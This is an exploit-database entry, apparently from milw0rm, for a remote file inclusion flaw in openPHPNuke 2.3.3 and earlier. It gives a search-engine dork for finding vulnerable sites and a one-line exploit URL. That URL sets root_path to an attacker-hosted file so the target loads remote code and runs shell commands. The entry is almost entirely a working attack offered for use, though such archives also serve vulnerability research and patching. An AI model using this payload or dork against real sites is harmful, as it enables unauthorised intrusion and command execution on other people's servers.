openPHPNuke 2.3.3 - Remote File Inclusion

EDB-ID:

1727


Author:

[Oo]

Type:

webapps


Platform:

PHP

Date:

2006-04-29


Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]